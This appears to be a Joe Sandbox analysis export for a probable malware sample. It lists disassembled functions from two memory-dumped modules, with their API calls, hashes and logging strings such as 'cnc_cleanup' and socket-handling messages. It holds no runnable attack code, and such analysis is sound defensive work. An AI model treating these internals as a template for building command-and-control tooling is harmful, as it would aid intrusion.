Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: Sleep_amsg_exit$_initterm
String ID:
API String ID: 2193611136-0
Opcode ID: ff15f92263da72b6589bcb57768b1c9c5409c3588207ae47f6362082b155a3ca
Instruction ID: f34457f9bd75a506dee2f4c7a1a3430d0ade24ef32a4bfaa87ae819c9de98d2f
Opcode Fuzzy Hash: ff15f92263da72b6589bcb57768b1c9c5409c3588207ae47f6362082b155a3ca
Instruction Fuzzy Hash: F1414F25B0DE4286F7669B97D89027D32AEAF487E4F5840B9DD4D873B1EE2CE540C342

Function 00007FFE1330100C Relevance: 9.1, APIs: 6, Instructions: 101sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,00000000,00007FFE1330F044,00007FFE13301240), ref: 00007FFE1330107F
_amsg_exit.MSVCRT(?,00000000,00007FFE1330F044,00007FFE13301240), ref: 00007FFE133010A1
_initterm.MSVCRT ref: 00007FFE133010DB
Sleep.KERNEL32(?,00000000,00007FFE1330F044,00007FFE13301240), ref: 00007FFE13301132
_amsg_exit.MSVCRT(?,00000000,00007FFE1330F044,00007FFE13301240), ref: 00007FFE13301149

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: Sleep_amsg_exit$_initterm
String ID:
API String ID: 2193611136-0
Opcode ID: 0cecec70258728eb6715608d41813f9c103590fdecf603ec3132883e55843f2c
Instruction ID: 52e27b6f7e2f30713582dc6a79cd1bf3bc124d542c3b1bddc5a567d77d10fbb0
Opcode Fuzzy Hash: 0cecec70258728eb6715608d41813f9c103590fdecf603ec3132883e55843f2c
Instruction Fuzzy Hash: 29418D25E0DE46CDFB598B57D95033D2391AF68BA4F5840B1CD6DA73B2DE2CE4408348

Function 00007FFE115040A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE11509EE7: EnterCriticalSection.KERNEL32 ref: 00007FFE11509F1F
Part of subcall function 00007FFE11509EE7: GetProcessHeap.KERNEL32 ref: 00007FFE11509F7B
Part of subcall function 00007FFE11509EE7: HeapFree.KERNEL32 ref: 00007FFE11509F8C
Part of subcall function 00007FFE11509EE7: LeaveCriticalSection.KERNEL32 ref: 00007FFE11509FAF

WaitForSingleObject.KERNEL32 ref: 00007FFE115040CC
CloseHandle.KERNEL32 ref: 00007FFE115040D9

Strings

Done, xrefs: 00007FFE11504150
cnc_cleanup, xrefs: 00007FFE11504157
[I] (%s) -> %s, xrefs: 00007FFE1150415E

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: CriticalHeapSection$CloseEnterFreeHandleLeaveObjectProcessSingleWait
String ID: Done$[I] (%s) -> %s$cnc_cleanup
API String ID: 2328319284-299082219
Opcode ID: 3cfcfb82a74db4adafacd3c664063167480534ea8effa3f1f5740a816187b25e
Instruction ID: d1189c635d3bbef099492b6c22871bc1c7c28a8822f052a509b623043feeda67
Opcode Fuzzy Hash: 3cfcfb82a74db4adafacd3c664063167480534ea8effa3f1f5740a816187b25e
Instruction Fuzzy Hash: EC119E60A49E4385F742AF63E868369366AAF41378F5003B9D03D0A2F1CFBDA5898740

Function 00007FFE13301462 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28networkCOMMON

Download Yara Rule

APIs

shutdown.WS2_32 ref: 00007FFE13301470
WSAGetLastError.WS2_32 ref: 00007FFE13301499

Part of subcall function 00007FFE1330A202: fwrite.MSVCRT ref: 00007FFE1330A2AE
Part of subcall function 00007FFE1330A202: fflush.MSVCRT ref: 00007FFE1330A2BA

Strings

[E] (%s) -> shutdown failed(sock=0x%llx,chan=%d,WSAgle=%d), xrefs: 00007FFE133014B7
sock_shutdown, xrefs: 00007FFE1330147E, 00007FFE133014B0
[D] (%s) -> Done(sock=0x%llx), xrefs: 00007FFE13301485

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: ErrorLastfflushfwriteshutdown
String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> shutdown failed(sock=0x%llx,chan=%d,WSAgle=%d)$sock_shutdown
API String ID: 2143829457-932964775
Opcode ID: 7957e1a164f942eee286496fe50f43704e342ae98909b51402a0abedeb623535
Instruction ID: 235941b6d674569a183340f88eecfbccac0222a4c43a48cedbdc5fee064c3e32
Opcode Fuzzy Hash: 7957e1a164f942eee286496fe50f43704e342ae98909b51402a0abedeb623535
Instruction Fuzzy Hash: 32F09065E0CC02D9E6505717EC454B81211AF307B0F4441B2D93C721B2EE1C99868308

Function 00007FFE133014C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 26networkCOMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 00007FFE133014E6
WSAGetLastError.WS2_32 ref: 00007FFE13301509

Part of subcall function 00007FFE1330A202: fwrite.MSVCRT ref: 00007FFE1330A2AE
Part of subcall function 00007FFE1330A202: fflush.MSVCRT ref: 00007FFE1330A2BA

Strings

[E] (%s) -> closesocket failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE1330151C
sock_close, xrefs: 00007FFE133014F4, 00007FFE13301515
[D] (%s) -> Done(sock=0x%llx), xrefs: 00007FFE133014FB

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: ErrorLastclosesocketfflushfwrite
String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> closesocket failed(sock=0x%llx,WSAgle=%d)$sock_close
API String ID: 152032778-2221966578
Opcode ID: 8c2479271ebde7624cfa049f0fd4b269a3277dd3b9c28245840a48b3d178eb16
Instruction ID: 45d8649f41e5224a216d4ac9aa40f9e3e88eaadfe2f233530aec597b525a9325
Opcode Fuzzy Hash: 8c2479271ebde7624cfa049f0fd4b269a3277dd3b9c28245840a48b3d178eb16
Instruction Fuzzy Hash: 2CF05E58E08D07C9FA505BA7E8550B96220AF347B4F5413B2D53E762F7AE1CA58A8309

Function 00007FFE1330A65C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 21COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE1330A676
DeleteCriticalSection.KERNEL32 ref: 00007FFE1330A6A3

Strings

[I] (%s) -> %s, xrefs: 00007FFE1330A6C2
debug_cleanup, xrefs: 00007FFE1330A6BB
Done, xrefs: 00007FFE1330A6B4

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: CriticalDeleteSectionfclose
String ID: Done$[I] (%s) -> %s$debug_cleanup
API String ID: 3387974148-4247581856
Opcode ID: b2d412c44e570df1dabc8f2e7e8fd3ffd28a8ae6c2bb712ee4117a751477ab3f
Instruction ID: 45a799861454babe650d6aeedb534beffe48cb7cd950cc2c6dca894fa030a84d
Opcode Fuzzy Hash: b2d412c44e570df1dabc8f2e7e8fd3ffd28a8ae6c2bb712ee4117a751477ab3f
Instruction Fuzzy Hash: E8F0A424A0AE42CCFA049B52E8A57793B60AF70364F5445B5C42D7A176CF7CA149878C

Function 00007FFE11508C8D Relevance: 7.5, APIs: 6, Instructions: 37memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FFE11508C99
HeapFree.KERNEL32 ref: 00007FFE11508CAA
GetProcessHeap.KERNEL32 ref: 00007FFE11508CC4
HeapFree.KERNEL32 ref: 00007FFE11508CD5
GetProcessHeap.KERNEL32 ref: 00007FFE11508CE4
HeapFree.KERNEL32 ref: 00007FFE11508CF5

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 425540c05eb6a60fe69dc6db63991cc4a0214c7dbd5d9d62c1d2ec61040ccf1f
Instruction ID: 20a6b69da0a110726e50997fb6c54d56ad15d9f085be6e1817883876be2ba4b7
Opcode Fuzzy Hash: 425540c05eb6a60fe69dc6db63991cc4a0214c7dbd5d9d62c1d2ec61040ccf1f
Instruction Fuzzy Hash: 70F08156E0BE5182F7641FD3D8047782669BF88FE1F2840B8CE0D1B7799D2CA8068312

Function 00007FFE1150E63A Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 161memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?,?,00007FFE11513964,?,?,00007FFE1150119E), ref: 00007FFE1150E887

Strings

Unknown pseudo relocation bit size %d., xrefs: 00007FFE1150E7B0
Unknown pseudo relocation protocol version %d., xrefs: 00007FFE1150E72D
%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FFE1150E822

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: ProtectVirtual
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 544645111-1286557213
Opcode ID: 4b2f20d95895ebfb49c3b06f6b12392f56a415d92b798b9bea8858d5e957f50b
Instruction ID: 1d30246ce6c8748e335536040ef9b94f4a68c9a8875a318bb049c4878b1c052f
Opcode Fuzzy Hash: 4b2f20d95895ebfb49c3b06f6b12392f56a415d92b798b9bea8858d5e957f50b
Instruction Fuzzy Hash: 25519D62F08E6285EB248BA7D94427C23A9EF40BB4F2481B9D91D477F9DE3CE581D700

Function 00007FFE1330AAEA Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 161memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?,?,00007FFE1330F044,?,?,00007FFE1330119E), ref: 00007FFE1330AD37

Strings

Unknown pseudo relocation bit size %d., xrefs: 00007FFE1330AC60
Unknown pseudo relocation protocol version %d., xrefs: 00007FFE1330ABDD
%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FFE1330ACD2

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: ProtectVirtual
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 544645111-1286557213
Opcode ID: 144d5e5b304bab7244275e38464320ad153038b33a392ceb6dd9dae6343fccf4
Instruction ID: 79c93584b81b4953deead28a473fbe244fbc77c711c3bf87e9affc92c482aa90
Opcode Fuzzy Hash: 144d5e5b304bab7244275e38464320ad153038b33a392ceb6dd9dae6343fccf4
Instruction Fuzzy Hash: 54517161B189468EFA108B1AE54077C2761AF64BB4F0482B5D93D677E9DE3CE5828708

Function 00007FFE13301596 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE133015BE
WSAGetLastError.WS2_32 ref: 00007FFE133015D5

Strings

[E] (%s) -> setsockopt(SO_KEEPALIVE) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE133015EC
tcp_set_keepalive, xrefs: 00007FFE133015E5

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(SO_KEEPALIVE) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_keepalive
API String ID: 1729277954-536111009
Opcode ID: 165cd1ca86b32e639d495e5289d91cf5dcf8076240978b24a20d2f6bd5de3276
Instruction ID: 3d9ffdd557661797fb76136b962e873e2f976de1e99d3e60a3c17eaf645309a9
Opcode Fuzzy Hash: 165cd1ca86b32e639d495e5289d91cf5dcf8076240978b24a20d2f6bd5de3276
Instruction Fuzzy Hash: D5F0B461B189468EF3209B57B800469A660FFA87B0F508275ED7DA37B5DF7CD90A8B04

Function 00007FFE115016EC Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 21COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32 ref: 00007FFE11501733

Strings

Done, xrefs: 00007FFE11501744
debug_cleanup, xrefs: 00007FFE1150174B
[I] (%s) -> %s, xrefs: 00007FFE11501752

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: CriticalDeleteSection
String ID: Done$[I] (%s) -> %s$debug_cleanup
API String ID: 166494926-4247581856
Opcode ID: e16006ad1eebfa94513ddb4bd1208f827e843172f43d439b0ae009f34803d196
Instruction ID: 4a5d84c61deff183053eea772f72e1f78d47ad870a396d3982c46ad3a2f048a4
Opcode Fuzzy Hash: e16006ad1eebfa94513ddb4bd1208f827e843172f43d439b0ae009f34803d196
Instruction Fuzzy Hash: BBF03A24E4AE4380FB02EB53E898379376E6F41364F8410B9C40D06271CF7CA449C341

Function 00007FFE11504170 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18COMMON

Download Yara Rule

APIs

GetModuleHandleExA.KERNEL32 ref: 00007FFE1150418E
GetLastError.KERNEL32 ref: 00007FFE115041AB

Strings

module_current, xrefs: 00007FFE115041B4
[E] (%s) -> GetModuleHandleExA failed(gle=%lu), xrefs: 00007FFE115041BB

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorHandleLastModule
String ID: [E] (%s) -> GetModuleHandleExA failed(gle=%lu)$module_current
API String ID: 4242514867-2427012484
Opcode ID: de8f622d8abfe16151a34b6b50d39ef6d00e3aaf6a7b449b9ac6f40651020029
Instruction ID: 7aa8b20fc8bca05de7feb5d05e05964c70c61aafaedb1e709a0d5896e3c045d3
Opcode Fuzzy Hash: de8f622d8abfe16151a34b6b50d39ef6d00e3aaf6a7b449b9ac6f40651020029
Instruction Fuzzy Hash: 5AF03021B28E03C0E7209B52E84036E3B6AFB55368FC401B5C54D42674DF7CD119C741

Function 00007FFE13307140 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18COMMON

Download Yara Rule

APIs

GetModuleHandleExA.KERNEL32 ref: 00007FFE1330715E
GetLastError.KERNEL32 ref: 00007FFE1330717B

Strings

[E] (%s) -> GetModuleHandleExA failed(gle=%lu), xrefs: 00007FFE1330718B
module_current, xrefs: 00007FFE13307184

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: ErrorHandleLastModule
String ID: [E] (%s) -> GetModuleHandleExA failed(gle=%lu)$module_current
API String ID: 4242514867-2427012484
Opcode ID: dc740bd38e7be61ee9de713c700e00f2c4b8b94f34ca0cffaf1a8ca8de9b2ef5
Instruction ID: d82668dfd4fb545c2ef8de328de60c9237ab7e66ba35ceb06ae5774dace40d5f
Opcode Fuzzy Hash: dc740bd38e7be61ee9de713c700e00f2c4b8b94f34ca0cffaf1a8ca8de9b2ef5
Instruction Fuzzy Hash: 26F06520A0CE02C4F7259B12E8403AE2761FF647B8F8401B2C56D226B5CF3CD249C708

Function 00007FFE11502527 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 9networkCOMMON

Download Yara Rule

APIs

WSACleanup.WS2_32 ref: 00007FFE1150252B

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

Done, xrefs: 00007FFE11502531
[I] (%s) -> %s, xrefs: 00007FFE1150253F
net_cleanup, xrefs: 00007FFE11502538

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: Cleanupfflushfwrite
String ID: Done$[I] (%s) -> %s$net_cleanup
API String ID: 1441811225-3926276259
Opcode ID: a12471e7995a5cf6f2fbd275d2e1fb1049ad2213750b30cc07cf48e9de6b368c
Instruction ID: 23838a873932824f503141621341a200bff880dcf050b138e27fd2158dcf4c82
Opcode Fuzzy Hash: a12471e7995a5cf6f2fbd275d2e1fb1049ad2213750b30cc07cf48e9de6b368c
Instruction Fuzzy Hash: 5DD01261E4BD07D1EB056757DC850B9272BAF50374FE060F1C10D010309F2CA14BC301

Function 00007FFE13302047 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 9networkCOMMON

Download Yara Rule

APIs

WSACleanup.WS2_32 ref: 00007FFE1330204B

Part of subcall function 00007FFE1330A202: fwrite.MSVCRT ref: 00007FFE1330A2AE
Part of subcall function 00007FFE1330A202: fflush.MSVCRT ref: 00007FFE1330A2BA

Strings

net_cleanup, xrefs: 00007FFE13302058
[I] (%s) -> %s, xrefs: 00007FFE1330205F
Done, xrefs: 00007FFE13302051

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: Cleanupfflushfwrite
String ID: Done$[I] (%s) -> %s$net_cleanup
API String ID: 1441811225-3926276259
Opcode ID: 04378ce227c48fd8509de74ca1f8afee5d89b1fff0da950f5c4465d2b4b82116
Instruction ID: 4024b4aabfd88925fe975af76ea1e23cfbfce689748afeb5847ec790cf3d5e42
Opcode Fuzzy Hash: 04378ce227c48fd8509de74ca1f8afee5d89b1fff0da950f5c4465d2b4b82116
Instruction Fuzzy Hash: 85D0C961E4DD07D8EA04AB12EC460A45360AF74325F9050B2C02C611379E6CA15AC788

Function 00007FFE11512430 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FFE115124AB
IsDBCSLeadByteEx.KERNEL32 ref: 00007FFE115124C6
MultiByteToWideChar.KERNEL32 ref: 00007FFE1151251A
_errno.MSVCRT ref: 00007FFE11512524

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: Byte$CharMultiWide$Lead_errno
String ID:
API String ID: 2766522060-0
Opcode ID: e51ed71a1184e0be453004719148579e0cf7ea03b994c715d1ac3cde1f9619a6
Instruction ID: 80d84e651777772efb74b7a07583b7126540c1d2876c382134958351f690a143
